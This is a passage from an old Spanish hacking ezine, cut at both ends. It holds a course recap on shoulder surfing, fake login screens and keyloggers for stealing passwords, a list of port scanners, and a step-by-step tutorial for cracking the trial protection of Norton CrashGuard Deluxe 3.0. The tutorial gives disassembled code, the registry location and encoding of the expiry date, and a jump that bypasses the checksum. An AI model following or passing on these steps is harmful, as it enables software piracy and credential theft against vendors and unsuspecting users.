  con esta tecnica y ademas seguir los pasos explicados en el numero 1 del
  ezine, ya que tenemos que tener mucho cuidado de lo que decimos y de quien
  nos hacemos pasar, ya que nos podriamos delatar.

        El capitulo II esta enfocado a tecnicas hacker utilizando el
  ordendaor como herramienta, me estoy refiriendo logicamente a: Shoulder
  Surfing, Trashing, Pantallas Falsas y Key Recorder. Ahora explicaremos cada
  una de las diferentes tecnicas. Shoulder Surfing es sencillamente mirrar por
  encima del hombro cuando una persona esta metiendo su login y password para
  entrar en su cuenta. Trashing cuando 'cotilleamos' la basura de un ISP,
  Telefonica, etc... con el fin de obtener alguna informacion util para
  hackear. Las Pantallas Falsas son cuando escribimos un pequeo programa que
  simula la conexion a un servidor y cuando la victima introduce su login y
  password, estos quedan grabados para nuestro posterior uso. Los Key
  Recorder son parecidos a las Pantallas Falsas, ya que eston son unos
  pequeos programas que se dejan residentes en memoria para que vaya grabando
  las teclas que los usuarios pulsen. Logicamente aqui solo he definido de
  manera sencilla el uso de las diferentes tecnicas, para profundizar en la
  materia conviene leerse otra vez el numero II del ezine.

        El capitulo III se dedico a una interesante y util herramienta de un
  hacker, me estoy refiriendo al scaneo de puertos, ya que esto nos sera de
  gran ayuda para buscar bug's en los servidores y poder colarnos o taparlos
  :). Es conveniente tener a mano un listado de los puertos, como el que se
  incluyo en el ezine III y tb disponer de varios tipos de scaners como por
  ejemplo para scanear puertos, sub-dominios, etc... Al igual que antes para
  coger mas soltura leerse el capitulo III.

  - Aqui Os Pongo Un Listado De Diferentes Scaners Que Os Pueden Ser Utiles.

  #ident-scan.c

  #ftp-scan.c

  #jakal.c

  #strobe103_tar.gz

  #scan.sh

  #statd-scan.c

  #udpscan.c


        El capitulo IV junto con el III consiste en analisis de servidores,
  en esta entrega vimos como utilizar diferentes comandos del s.o. Unix/Linux
  para obtener informacion de un servidor remoto. Siendo muy util tanto para
  un hacker como para un Administrador. Tengo que confesar que no explique
  todos los comandos que nos pueden ser utiles para un analisis pero si lo
  explico todo, entonces no tiene gracia y como es bien sabido 'Un hacker se
  hace a si mismo a base de estudio y paciencia'. Tambien deciros que para
  aplicar estos metodos de analisis conviene saber Unix/Linux ya que sino,
  si solo plagiamos los comandos explicados, no sabemos que hacen exactamente
  y no queremos aprender nada mas, entonces no llegaremos muy lejos y ni
  siquiera seremos un intento de hacker.

        Ahora ya creo que las dudas que hubiese podido haver han desaparecido,
  pero lo conveniente seria volverse a leer los capitulos que no hayan quedado
  claros y por supuesto experimentar con lo aprendido. Desde estas lineas
  quiero hacer un llamamiento a aquellos lectores que sigan el curso y
  consigan resultados positivos para que nos envien un mail poniendo en el
  subject :'Curso Hack JJF' y asi lo pondre aqui para que todos lo vean,
  incluso si has creado algo nuevo, pues mucho mejor :) Para los paranoicos
  tenemos a disposicion la llave publica PGP de - J.J.F. / HACKERS TEAM -.

        Pues viene el tipico rollo pero que nos puede ser muy util, es el
  bocabulario tecnico que hemos estado usando en el curso.

  - Un Poco De Bocabulario Tecnico.

  #C: Lenguaje de programacion general.

  #Hacker: Persona que disfruta explorardo nuevos usos en la tecnologia por
           puro placer, jamas con fines delictivos.

  #Hacking: Accion realizada por un hacker.

  #Ingenieria Social: Tecnica por el cual un hacker engaa a una persona para
                      sacarle informacion privilegiada.

  #Key Recorder: Programa el cual graba las teclas que van siendo pulsadas.

  #Linux: Sistema Operativo semejante al Unix el cual es gratis.

  #Pantallas Falsas: Tecnica o Programa el cual simula la conexion a un
                     servidor para interceptar login y password.

  #PGP: Pretty Good Privacy. Programa de criptografia el cual no puede ser
        desencriptado actualmente.

  #Puerto: Medio por el cual un servicio de un servidor se comunica con el
           cliente.

  #Shoulder Surfing: Tecnica que consiste en mirrar por el encima del hombro.

  #S.O.: Sistema Operativo. 

  #Trashing: Tecnica en la cual se cotillea la basura fisicamente para obtener
             informacion util.

  #Unix: Sistema Operativo, que cual es multitarea y multiusuario.

        Bueno chicos, esto es todo por hoy y ya en el proximo capitulo
  haremos algo mas interesante, pero como debeis comprender estos capitulos de
  repaso son necesarios.

  Byes all y hasta la vista !!
    
                                                        CONDE VAMPIRO
                                                  - J.J.F. / HACKERS TEAM -

<>

<>

                 -->>->  CORTA HISTORIA DEL TIEMPO  <-<<--

  Norton CrashGuard Deluxe 3.0

  TIPOS DE PROTECCIONES TEMPORALES
  UN POCO DE TEORIA
  EN BUSCA DE LA FRASE MAGICA
  EL REGISTRO DEL SISTEMA

  COMO CRACKEAR Norton CrashGuard Deluxe 3.0

  PRIMERA EXPLORACION
  PRIMERA SORPRESA
  SEGUNDA SORPRESA

  LA APROXIMACION DIFICIL

  AL ATAQUEEEEEEEEEEEEEE
  LA FECHA DE CADUCIDAD
  CHECKSUMS PARAINOCOS
  CHECKSUMS HASTA EN LA SOPA
  LA MISMA PROTECCION EN TODOS SITIOS

  LA APROXIMACION FACIL

  REUNIENDO LAS PIEZAS
  LA COMPRA VIRTUAL
  MODIFICANDO EL REGISTRO
  MODIFICACIN DE LA VARIABLE DEL REGISTRO DEL SISTEMA

  MORALEJA

  Saludos Familia.

        Bastante tiempo desde mi ultimo articulo, los se, pero ya estamos de
  vuelta. Nos ocuparemos ahora de las protecciones temporales, veremos un
  poco de teoria y lo aprendido lo aplicaremos al programa Noton Uncrash
  Deluxe desde dos puntos de vista, el temporal y el de la password pa
  registrarse.

  TIPOS DE PROTECCIONES TEMPORALES

        Demos un peque repaso a los diferentes esquemas de proteccion
  temporal que nos podemos encontrar (recomiendo la lectura del Capitulo
  4.1 de +ORC )

        - CINDERELLA. El programa funciona durante una cierto periodo de dias
  (digamos 15 dias) comenzando desde la fecha de instalacion.

        - BEST_BEFORE. El programa funciona durante una cierto periodo de
  tiempo independientemente de la fecha de instalacion. El programa caduca
  el 30/12/97.

        - COUNTDOWN. El programa funciona solo durante unos minutos o unos
  segundos.

        - QUIVER. El programa funciona solo durante un numero determinado de
  ejecuciones. Realmente no es una proteccion temporal, pero su esquema de
  proteccion se parece mucho al de los otros tres tipos.

  UN POCO DE TEORIA

        Analizemos como funciona una proteccion temporal.

        Los "inteligentes programadores" ofertan sus productos completos al
  publico con ridiculas protecciones. Le colocan una fecha de caducidad,
  pasada la cual, el programa no funciona. Esta idea la utilizan sobretodo
  las grandes compaias como Micro$oft, Corel, o Symantec. La idea es
  distribuir masivamenete sus productos aprovechando los estupendos canales
  de distribucion que ofrecen las revistas de Soft. Una vez inundado el
  mercado, el usuario disfrutara del producto, se acostumbrara a el, hasta
  que le sea indispensable y tenga que comprarlo a un precio desorbitado.
  Esta tactica no es nueva, sino preguntad a algun camello, o como la CIA
  distribuyo la heroina entre el Black Power.

        Pensemos un poco. Como conoce el programa que ya ha caducado el
  periodo de evaluacion?. Supongamos que tenemos una evaluacion e 15 dias e
  instalamos nuestro programa el 1 de febrero. Sumando la fecha de
  instalacion (1 Febrero) mas el periodo de prueba se obtiene la fecha de
  caducidad:15 febrero (El dia en el que lo instalas cuenta como dia habil).
  El programa, lo primero que calcula es si la fecha actual es menor o igual
  que la fecha de caducidad, y en tal caso, se ejecuta normalmente. Si es
  mayor, dara un bonito mensaje "El periodo de evaluacion ha expirado".

        Una cosa esta clara, el programa debe guardar alguna de las dos
  fechas siguientes (o las dos):

  A - Fecha de Instalacion y el periodo de evaluacion.
  B - Fecha de caducidad.

        Lo normal es la opcion B. Al instalarse el programa, se calcula la
  fecha de caducidad y se guarda en algun sitio. Normalmente se guarda en el
  registro del sistema bajo algun nombre estupido, aunque se puede guardar en
  el win.ini, system.ini, fichero oculto, o algun fichero que parezca
  inofensivo. Lo cierto es que debe guardarlo.

        Existe una variante, y es que la fecha de caducidad este dentro del
  ejecutable. Un ejemplo lo tenemos en la evaluacion del Hotmetal 4.0., del
  tipo BEST_BEFORE, que dentro de su ejecutable aparecia 31/12/97. Madre de
  Mitra, que estupidos pueden llegar a ser los zombi-programadores.
  Dependiendo de la pericia del programador la fecha de caducidad puede estar
  o no encriptada para ocultarla de la vista del usuario y para que sea
  dificil modificarla. Resumiendo, el programa debe guardar la fecha de
  caducidad y comprobarla al inicio del programa con la fecha actual.

        Ya sabemos de donde saca la fecha de cadudidad, pero, de donde saca
  la fecha actual?. Normalmente (el 99% de las veces) se extrae con una
  llamada a la funcion getlocaltimeo o getsystemtime. Pero se puede extraer
  viendo la fecha de algun fichero que se modifique periodicamente como el
  system.dat o el bootlog.txt.

  Los puntos de ataque a este esquema son claros:

        - Atacar en el calculo de la fecha de caducidad.
  En vez de sumar 15 dias sumamos 15 siglos. Esta aproximacion es dificil por
  que el calculo se realiza una unica vez, generalmente en la instalacion.

        - Modificar la fecha de caducidad.
  Si la fecha esta encriptada, necesitariamos construir un algoritmo de
  encriptacion para la nueva fecha que deseemos introducir. Por lo que en
  general, puede ser complicado.

        - Forzar la caducidad del programa.
  Se analizan los mensajes que da el programa y a partir de ellos se le sigue
  la pista hacia atras. Es una tactica muy utilizada.
 
        - Atacar en la comprobacion de la fecha actual y la fecha de
          caducidad.
  Simplemente modifica la comprobacion para que siempre estemos en el periodo
  de evaluacion. Esta es una opcion elegante.

        Alguien podria pensar que si se echa pa tras el reloj de W95, la
  proteccion temporal se elimina. Para evitar esta "trampilla", los
  programadores colocan codigo como el siguiente:

        SI esta activada la marca de caducidad ENTONCES el programa ha
  caducado y se finaliza el programa DE LO CONTRARIO SI
  fechaActual>fechaCAducidad ENTONCES activar marca de caducidad

        Como veis si os pasais de la fecha de caducidad, se activa una marca
  que impedira que se ejecute el programa aunque modifiqueis el reloj. Esta
  marca se guarda en los mismos sitios donde se guarda la fecha de caducidad.

        A veces, la proteccion temporal queda eliminada introduciendo una
  palabra clave, por lo que a veces es mas rapido atacar por la password.

        Para averiguar el fichero que contiene la proteccion temporal, se
  puede usar el SoftIce y poner un bpx getlocaltime, o bien una nueva tecnica,
  muy util no solo para protecciones temporales. Veamosla.

  EN BUSCA DE LA FRASE MAGICA

        Todos los mensajes de un programa, los de error, los de felicitacion,
  los de aviso, no son mas que cadenas de caracteres que deben de residir en
  un fichero. Para protecciones temporales es util buscar mensajes como
  'expire', 'demo', 'evaluation'. Si localizamos estos mensajes habremos
  localizado, generalmente, el fichero que contiene la proteccion y podemos
  desensamblarlo o pasarle el Softice. Extendiendo esta idea, basta con
  buscar los mensajes 'unregistered', 'register' para localizar el programa
  con la proteccion en esquemas por palabra clave. Recomiendo una herramienta
  excelente para buscar cadenas, es el programa sr32.exe, Search & Replace
  for Win 3x 95/NT, Funduc Software, Inc. (www.funduc.com). Bajaoslo y
  crackearlo, tiene una bonita y sencillota proteccion del tipo CINDERELLA.

  EL REGISTRO DEL SISTEMA

        El Registro del Sistema no es mas que un fichero gigante (system.dat)
  donde W95 y el esto de los programas dejan sus miserias, osea, sus
  variables, sus parametros de configuracion, su fecha de caducidad, sus
  marcas de caducidad. Muchos cracks solo necesitan modificar adecuadamente
  el system.dat  Es muy conveniente que le echeis un vistazo, aprendereis
  mucho y podreis modificar muchos de los parametros del Windoze.

        Para editar el registro, se utiliza normalmente el programa
  regedit.exe que encontrareis en vuestro directorio de Windows. Recomiendo
  que lo ejecuteis con el parametro /v ,osease, c:\windows\regedit /v

  COMO CRACKEAR Norton CrashGuard Deluxe 3.0

  Objetivo: Norton Uncrash Deluxe.
  Version: 3.0
  Nombre del ejecutable: ncgd3w95.exe
  Website: http://www.symantec.com 
  Tamao del ejecutable: 11.964.671 bytes.
  Tipo de proteccion: Cindirella
  Dificultad: Medio. 
  Tiempo de crackeo: 2 horas. 
  Herramientas: W32dasm8.X, SoftIce.

        En esta ocasion, nuestro objetivo es una gran y abominable compaia,
  la Symantec y uno de sus muchos y abominables producto: Norton CrashGuard
  Deluxe 3.0 Basicamente, el programa consigue, en algunas ocasiones, que las
  aplicaciones que se cuelgan no bloqueen al Windoze. Cosa de agradecer dado
  el alto indice de siniestralidad de las aplicaciones y del propio Windoze.
  Ademas de tener una B.D de informacion sobre el PC, una antivirus ... Se
  protege con proteccion temporal CINDERELLA de 30 dias.

  PRIMERA EXPLORACION

        Instalamos el programa y antes de finalizar la instalacion ya nos
  pide que nos registremos, mal asunto, quieren cobrar antes de que probemos
  su producto, su codicia de palpa ante incluso de ver el programa.

        Una vez  instalado, nos ha metido a escondidas varias cosas:

        - Una Dll con un extrao nombre: 30vfv6vn.sys situada en el raiz de
 la unidad c: El nombre varia en cada instalacion, solo permanece fijo
 *fv6vn.sys, los 3 primeros caracteres son variables. Sospecho que solo es un
 indicador para ver si el programa ya ha sido instalado.

        - Una aplicacion en el arranque del Windoze Norton CrashGuard Deluxe
  Autocheck. Si pulsais CRTL+ALT+SUPR podreis ver la aplicacion por dos veces
  con el nombre de checkup Su mision es detectar cualquier cambio en el reloj
  del sistema para bloquear inmediatamente la aplicacion si nos pasamos de la
  fecha de caducidad.

        Ademas se crean dos directorios Norton CrashGuard y Norton CrashGuard
  Deluxe y nos aparece un bonito icono en el escritorio del Windoze con forma
  de escudo y con el original nombre de Norton CrashGuard Deluxe. Y si por si
  fuera poco, dos iconos en la barra de tareas, la aplicacion propiamemte
  dicha (escudo gris con una N en azul) y una historia de los cuelges de los
  programas (un reondel con una marca de verificacion).

        Si pulsamos en el icono del escritorio nos aparece una ventana donde
  nos dice que nos compremos INMEDIATAMENTE la aplicacion a un precio
  fabuloso, $45.95, (unas 7.000 pelas) En la parte inferior aparecen el
  numero de dias que restan para el programa deje de funcionar. Ademas
  aparecen unos bonitos botones en los que nos podemos registrar por Internet,
  probar el producto o cancelar. Si probamos el producto, aparece la ventana
  principal con todas pas opciones. Si elegimos la opcion de registro,
  aparece una pantalla donde introducimos nuestros datos y nuestra tarjeta de
  credito.

  PRIMERA SORPRESA 

        El sistema de pago no es de la propia Symantec, sino de la empresa
  Release Software Corporation:http://www.releasesoft.com) y su programa
  SalesAgen. Es la primera vez y veo que Symantec no controle todos los
  aspectos de una aplicacion.

  SEGUNDA SORPRESA

        El fichero a estudiar es el Norton CrashGuard\cgmain.exe (229.376
  bytes) por una simple razon, tiene el unico fichero que tiene el icono que
  el del programa principal que aparece en la barra de tareas. Pero, en el
  mismo directorio aparece un extrao fichero llamado cgmain.dl_ (743.936
  bytes). Mu raro, una libreria aparentemente comprimida (y por tanto no
  utilizada) con un tamao mas grande que el ejecutable. Por que no esta
  descomprimida la libreria, quizas por que no estamos registrados? :-)

        Ademas aparece un ejecutable llamado cgmaipop.exe , cuyo nombre es mu
  parecido al fichero del programa que estamos analizando cgmain.exe y tiene
  un icono que tiene las letras RS, que curioso, justo las Iniciales del la
  empresa que dedica a comercializar el producto: Release Software. Si
  intentamos ejecutar cgmaipop.exe aparece que esta preparando el Software.
  PREPARANDO?, es que hay que precalentar los programas antes de
  instalarlos?. Luego aparece un mensaje de error indicando que no podemos
  ejecutar la aplicacion,  quizas por que no estamos registrados? :-)

        Por si fuera poco, aparece otro fichero cgmaitky.dll (257.977) con un
  nombre muy parecido al de la aplicacion que queremos estudiar y
  aproximadamente con el mismo tamao. Y el colmo, en el otro directorio,
  donde reside el menu de la aplicacion Norton CrashGuard Deluxe\CGDeluxe.exe
  aparecen los ficheros CGDelpop.exe con el logo RS y CGDeltky.dll.
  Analogamente para Norton CrashGuard Deluxe\checkup.exe (el programa de
  testeo de la fecha del sistema) CheckUp.dl_,Checktky.dll

        Todo esto huele a chamusquina, seguro que estos ficheros tienen algo
  que ver a la hora de registrar el programa, y como veremos en la segunda
  pate del articulo, tienen que ver y MUCHO.

  LA APROXIMACION DIFICIL

  AL ATAQUEEEEEEEEEEEEEE

        Podriamos analizar esos extraos ficheros que han aparecido, y lo
  haremos en la segunda parte del articulo. Ahora atacaremos formalmente a
  Norton CrashGuard\cgmain.exe para analizar su esquema CINDERELLA de 30 dias.

        Desensamblamos el programa con el w32dsam y obtenmos 3.5 MB de
  fichero. En las funciones importadas encontramos Addr:00045CC8 hint(00F5)
  Name: GetLocalTime. Bien, bien, asi que, aparentemente, esta usando la
  tipica rutina para obtener la fecha del sistema. Si vemos quien la utiliza,
  estaremos en plena rutina de comprobacion de fecha: fechaActual>fecha de
  caducidad?

        Solamente aparece la funcion getlocaltime que es utilizada una vez en
  el programa(por que lo ponen tan facil?)

  * Referenced by a CALL at Addresses:
  |:0040D5B4   , :0040DA44   , :0040DD3F;   La rutina es llamada 3 veces

  :0041E200 81ECCC000000            sub esp, 000000CC
  :0041E206 8D442410                lea eax, dword ptr [esp+10]
  :0041E20A 50                      push eax

  * Reference To: KERNEL32.GetLocalTime, Ord:00F5h
  |
  :0041E20B FF15BC544400            Call dword ptr [004454BC]
  :0041E211 8D4C2400                lea ecx, dword ptr [esp]
  :0041E215 51                      push ecx

  * Reference To: KERNEL32.GetSystemTime, Ord:0135h
  |
  :0041E216 FF15B8544400            Call dword ptr [004454B8]
  .....

        Ademas aparece la llamada tambien a  GetSystemTime.

        Tras la llamada a GetSystemTime los valores de ao, mes, dia,.... son
  extraidos de la pila y guardados en los registros :0041E21 mov dx, word ptr
  [esp+0A] De los registros pasan a unas variables globales :0041E2AA mov
  dword ptr [0042F7F0], edx

        Recordad, cualquier posicion de memoria fija como [0042F7F0], es
  utilizada como variable global por el programa. Despues se reintroducen en
  la pila el ao, el mes, el dia,.... y se llama a la rutina :0041E310 call
  00423420.

        En esta rutina es donde se realiza la encriptacion de la fecha,al
  finalizar, devuelve en eax la fecha encriptada y ademas de guardarse en
  :0041E323 mov dword ptr [ecx], eax

        Es mas, las tres llamadas a :0041E200 obtendran en eax la fecha
  encriptada de vuelta por call 00423420. Nos os voy a aburrir con diciendo
  como es la rutina de encriptacion. Simplemente decir que utiliza la
  siguiente formula :

  t=seconds+(secondsMinute*minutes)+(secondsHour*hour)+(secondsDay*day)+
  (secondsDay*daysMonth[month])+(secondsYear*(year-1900))+(secondsDay*((
  (year-1900)-1)/4));
  fin=(t+fixValue);

        Siempre es mas facil comparar un numero que comparar aos, dias,
  meses,... por eso la fecha se transforma en un numero. He construido un
  pequeo programa NORTON.EXE en C que realiza todo el proceso de
  encriptacion de la fecha.

        Bien, lo logico, es que una vez encriptada la fecha se compruebe con
  la fecha de caducidad que debe estar encriptada. Si analizamos las tres
  llamadas a :0041E200 tenemos:

  * La llamada desde :0040D5B4, se limita a guardar la fecha encriptada
  :0040D641 mov dword ptr [esi+000002AC], eax

  * La llamada desde :0040DA44, :0040DD3F  hacen practicamente lo mismo,
  mueven la fecha encriptada que estaba en eax a un registro, hacen una
  llamada a call 40DC40 y despues comprueban la fecha encriptada con
  [edi+00000284]

  En concreto para la llamada desde :0040DD3F
  :0040DD4B mov ebx, eax

  :0040DD62 push ebx
  :0040DD63 call 0040DC40

  :0040DD7B cmp dword ptr [edi+00000284], ebx
  :0040DDBF ja 0040DDE4

  En concreto para la llamada desde :0040DA44

  :0040DA54 mov edi, eax

  :0040DA5F push edi
  :0040DA60 call 0040DC40

  :0040DAB2 cmp dword ptr [ebx+00000284], edi
  :0040DAB8 ja 0040DACE

        Esto suena a una doble comprobacion temporal, seran desconfiados
  estos chicos.

        Pero que hace la llamada a call 0040DC40?, para ello cerramos el
  cgmain.exe: boton derecho sobre el icono de la N y el escudo y exit.
  Abrimos el loader del Softice y seleccionamos Norton CrashGuard\cgmain.exe
  y ponemos un bpx 40DC40 y lanzamos el programa. Aparecemos en el Softice,
  pulsamos F10 y vemos que ha sido llamada desde :40DD63. Cerramos el
  cgmain.exe otra vez, ponemos el softice un bpx 40DD63 y lanzamos el
  programa y prestamos atencion a ebx que es el que contiene la fecha
  encriptada.

        La llamada a call 0040DC40 simplemente realiza la siguiente
  comprobacion

  :0040DC56  cmp edx, eax; compara fechaAnterior,fechaActual
  :0040DC58  ja 0040DC64; Salta si eres un  mal chico.

        fechaAnterior es la fecha encriptada el la que se arranca por ultima
  vez el programa, fechaActual es la fecha encriptada obtenida de :0041E200.
  Es una simple comprobacion para ver si hemos echado para atras el reloj.

  La comprobacion 

  cmp dword ptr [ebx+00000284], edi; Analogamente cmp dword ptr
  [edi+00000284], ebx
  ja 0040DACE; Analogamente ja 0040DDE4

        Comprueba fechaCaducidad > fechaActual Si es mayor estamos en el
  periodo de prueba.

  LA FECHA DE CADUCIDAD

        La pregunta es, de donde se guarda la fecha de caducidad encriptada?.
  Poniendo un bpr ebx+00000284 ebx+00000284+5 descubrimos que la fecha de
  encriptacion se guarda en el registro del sistema y es recuperada por la
  llamada a la funcion :40BD89 RegqueryValueEXA. En concreto, se guarda en
  HKEY_CLASSES_ROOT\Ultxfile\Format\MSHAEZDOC\write

        En mi caso, el valor de write es:

       01 02 03 04 05 06 07 08

  01   00 00 00 05 B7 FF FF F8
  02   00 00 00 00 00 00 10 00
  03   08 00 00 00 08 00 00 00
  04   00 00 00 06 B3 36 71 A1
  05   FB 0F 81 A5 20 80 00 06
  06   B7 9F A9 A0 00 00 00 00
  07   00 00 00 06 B3 36 71 A0
  08   C3 28 00 00 18 00 00 00
  09   00 00 00 00 00

        La fecha de caducidad esta en write(5,7) hasta write(6,5) ambos
  inclusive. Lo curioso, es que la fecha esta codificada, por ejemplo si la
  fecha de caducidad es 0034F5F3D6 se guarda en write 0006B79FA9A000. La
  rutina de encriptacion esta en :40C0D6 y se basa en la operacion or 

  :0040C0D6 8A18                    mov bl, byte ptr [eax]
  :0040C0D8 8A11                    mov dl, byte ptr [ecx]
  :0040C0DA C0E305                  shl bl, 05
  :0040C0DD 48                      dec eax
  :0040C0DE C0EA03                  shr dl, 03
  :0040C0E1 49                      dec ecx
  :0040C0E2 0ADA                    or bl, dl
  :0040C0E4 4E                      dec esi
  :0040C0E5 885101                  mov byte ptr [ecx+01], dl
  :0040C0E8 885901                  mov byte ptr [ecx+01], bl

        He creado dos programas DECODE que decodifica el valor de write y
  CODE que codifica un valor de fecha para introducirlo en write.

  CHECKSUMS PARAINOCOS

        Los puntos de ataque son claros

  1.- Parchear las comprobaciones en el ejecutable.
  2.- Introducir una fecha caducidad en el ao 30000.

        1.- Si parcheamos el programa, se produce un error tan gordo que se
  casca windows. Esto se puede deber a que hemos crackeado mal obien exite un
  checksum. Para salir de dudas, basta con modificar alguna cadena de
  caracteres del ejecutable original Por ejemplo "not be run in DOS mode" lo
  pasamos a "not be RUN in DOS mode", si se casca es que hay un checksum,
  como en este caso.

        Un checksum es una comprobacion para ver si el ejecutable se ha
  modificado, normalmente se realiza sumando (XOR) los bytes del ejecutable y
  guardando este valor algun sitio (ejecutable, registro del sistema). El
  programa al arrancar suma (XOR) los bytes del ejecutable actual y comprueba
  la suma con el valor que tenia guardado. Si hay algun problema es que un
  virus o un cracker ha modificado el programa y esto nunca es bueno para el
  programador.

        En el caso del Norton CrashGuard Deluxe 3.0, el checksum se realiza
  de otra forma. Os acordais del fichero cgmaitky.dll, si hombre ese que nos
  parecia tan sospechoso. Pos bien, guarda todos los bytes del cgmain.exe
  encriptados (de ahi que tuvieran un tamao tan parecido ambos ficheros). La
  rutina de checksum, simplemente consiste en coger de 16 en 16 los bytes del
  cgmain.exe encriptarlos y ver si son iguales a 16 bytes del fichero
  cgmaitky.dll. Si existe alguna diferencia se produce un error de proteccion
  general y se casca todo.

        Para complicarlo todo, las rutinas de comprobacion (ver si los 16
  bytes del ejecutable son iguales a los 16 bytes del cgmaitky.dll) no estan
  metidas en un bucle, sino que estan a lo extenso. Es decir, hay una rutina
  de comprobacion para los 16 primeros bytes, otra disinta para los 16
  siguientes. Si queremos parchear el checksum, habra que modificar unas 30
  comprobaciones. Es curioso, pero existe un flag que desactiva la llamada al
  checksum :0040862D jne 00408695 si obligamos a saltar siempre, evitamos el
  checksum. PERO, POR QUE EXISTE UN FLAG PARA EVITAR EL CHECKSUM?, es que
  el programa cgmain.exe va a modificarse? Como veremos mas tarde, asi
  ocurrira.

        2.- Con el programa NORTON se crea la fecha de caducidad que queremos,
  con el programa CODE se encripta y ya solo hay que introducir el resultado
  en HKEY_CLASSES_ROOT\Ultxfile\Format\MSHAEZDOC\write en las posiciones
  write(5,7),write(6,5)

  CHECKSUMS HASTA EN LA SOPA

        Cuando la fecha de caducidad ha vencido, el programa deja de
  funcionar parcialmente, si analizamos el porque descubrimos que el byte
  [esi+00000568] controla todo el meollo. En concreto,

  Si [esi+00000568] = 02 You cannot Run this Application
  Si [esi+00000568] = 20 Your computer application source has changed
  Si [esi+00000568] = 08 Your free trial period is over
  Si [esi+00000568] = 04 OK

        Pero, como se rellena este byte?. Siguiendo la pista hacia atras
  descubrimos que se carga a partir de
  HKEY_CLASSES_ROOT\Ultxfile\Format\MSHAEZDOC\open

     00 01 02 03 04 05 06 07

  1  00 00 00 00 30 00 00 00
  2  00 00 00 00 00 00 10 00
  3  08 08 00 00 20 00 00 00
  4  00 00 00 00 00 00 00 00

        En concreto de write(3,4). Hay que tener cuidado por que esta
  encriptado, asi que hay que utilizar el programa DECODE. Osea , si en
  write(3,4)=20 indica que al desencriptarlo [esi+00000568]=4. Si
  write(3,4)=40 la fecha de caducidad ha vencido.

        Si ha pasado la fecha de caducidad y asignamos write(3,4)=20, el
  programa replica diciendo que hemos trampeado los recursos. QUE PASA AQUI?.

        Mu facil, HAY UN CHECKSUM en la seccion
  HKEY_CLASSES_ROOT\Ultxfile\Format\MSHAEZDOC\open. Estos es paranoico, un
  checksum en el propio registro del sistema. En concreto, el checksum esta
  en write(1,4). Se deja como ejercicio localizar y destruir este checksum.

  LA MISMA PROTECCION EN TODOS SITIOS

        Aunque parezca increible, los ficheros CGDeluxe.exe y CheckUp.exe
  tienen exactamente la misma proteccion que cgmain.exe y ademas en los
  mismos offset, osea en las mismas direcciones de memoria. Esto es
  extremadamente extrao, asi que adoptaremos otra via de ataque.

  LA APROXIMACION FACIL

  Veamos lo que tenemos:

        - Unos ficheros extraos asociados a los ficheros importantes.
  Sabemos la funcion de uno de ellos los *tky.dll sirven de checksum, pero y
  el resto para que sirven?

         - Un flag que desactiva el checksum del ejecutable.

        - Unos misteriosos fichero ejecutables con el logo RS que dicen que
  tiene que prepara el Sotware.

         Nos centraremos en los ejecutables con los logos RS.

  REUNIENDO LAS PIEZAS

        Para cada utilidad , p.e. CGDeluxe.EXE existe un fichero,
  CGDeltky.dll, que realiza funciones de checksum (como ya vimos), una
  libreria de un gran tamao , CGDeluxe.dl_ ,y un ejecutable CGDelpop.exe que
  "prepara el Software".

        No hay que ser un lince para darse cuenta que CGDelpop.exe "prepara"
  de alguna forma CGDeluxe.dl_  para aportar toda la funcionalidad a
  CGDeluxe.EXE. Esta "preparacion" solo se realiza cuando estamos registrados.

        Por tanto, se parte de un archivo ejecutable de un tamao inferior a
  la version completa del programa. Una vez realizado el proceso de compra se
  activa otro ejecutable que convierte la version de prueba en version
  completa .

        Todas las demas utilidades que acompaan al Norton CrashGuard Deluxe
  tienen el mismo proceso (CheckUP.exe ->Checkpop.exe, Checkup.dl_,
  Checktky.dll) (Cgmaipop.exe ->cgmain.exe, cgmaitky.dll)

  LA COMPRA VIRTUAL 

        Nos centraremos en el asistente (CGDeluxe.EXE) de compra que vimos en
  nuestra "Primera Aproximacion" : Doble click en el escudo con la N que hay
  en el escritorio y al pulsar el boton Buy Now (comprar ahora) aparece el
  asistente de compra.

        Este sera nuestro punto de entrada. Si pensamos un poco observaremos
  que la aplicacion que lanza el proceso de compra debe saber si la compra ha
  tenido exito o no. Por tanto, sera por aqui por donde centremos nuestros
  esfuerzos. Ademas debe de anunciar de alguna forma al resto de utilidades
  que la compra ha tenido exito para que ellas tambien se "preparen"
  Analizaremos el ejecutable CGDeluxe.exe (que el que se lanza al pulsar el
  icono del escritorio) y observaremos como "compra".

        Nada mejor que usar un desensamblador para investigar el programa
  CGDeluxe.exe (224 Kb). Una vez aparece el listado observamos que hace uso
  de la libreria comercial RSAGNT32.DLL (encargada de realizar la compra
  virtual) y que existen un referencias a funciones tales como SAInitialize,
  startSalesAgent. Estas van a ser nuestras funciones de aproximacion.

        Pulsamos en el boton de Imported Functions (Imp Fn) y hacemos doble
  click en la linea de rsagnt32.startSalesAgent.

        Aparecera en el listado lo siguiente:

  * Reference To: rsagnt32.startSalesAgent, Ord:000Eh

  :00407834 E807F30000            Call 00416B40    Llamada al asistente
  :00407839 83C408                add esp, 00000008
  :0040783C 66833D0425430000      cmp word ptr [00432504], 0000
  :00407844 742B                  je 00407871

        Echamos un vistazo hacia arriba y hacia abajo del listado y vemos que
  nos encontramos en un bloque de codigo que se encarga de cargar, iniciar,
  ejecutar, terminar el asistente de compra. Buscamos donde puede empezar el
  bloque. Y un poco mas arriba encontramos:

  ///////////// INICIO DE BLOQUE ////////////////
  * Referenced by a CALL at Address:
  :00406752                       <- desde aqui es llamado el bloque del
                                     asistente de compra

  :004077B0 A1B07B4300            mov eax, dword ptr [00437BB0]
  :004077B5 53                    push ebx
  :                               :
  :                               :
  * Reference To: rsagnt32.startSalesAgent, Ord:000Eh   <- Aqui hemos
                                                           comenzado
                                                           la busqueda

  :00407834 E807F30000            Call 00416B40         <- Llamada al
                                                           asistente
  :00407839 83C408                add esp, 00000008
  :0040783C 66833D0425430000      cmp word ptr [00432504], 0000
  :00407844 742B                  je 00407871
  :00407846 BFE0A54300            mov edi, 0043A5E0
  :                               :
  :                               :
  :00407878 5F                    pop edi
  :00407879 5E                    pop esi
  :0040787A 5B                    pop ebx
  :0040787B C3                    ret

  ///////////// FIN DE BLOQUE ////////////////

        Ahora una vez que conocemos desde donde hemos llamado al bloque,
  usamos el menu Goto -> Goto Code Location y escribimos el desplazamiento
  406752. Aqui observamos lo siguiente:

  * Possible Reference to String Resource ID=00001: "Turnkexe"

  :00406748 C705C826430001000000  mov dword ptr [004326C8], 00000001
  :00406752 E859100000                    call 004077B0   <- Entrada en el
                                                             bloque anterior
  :00406757 66392D04254300                cmp word ptr [00432504], bp
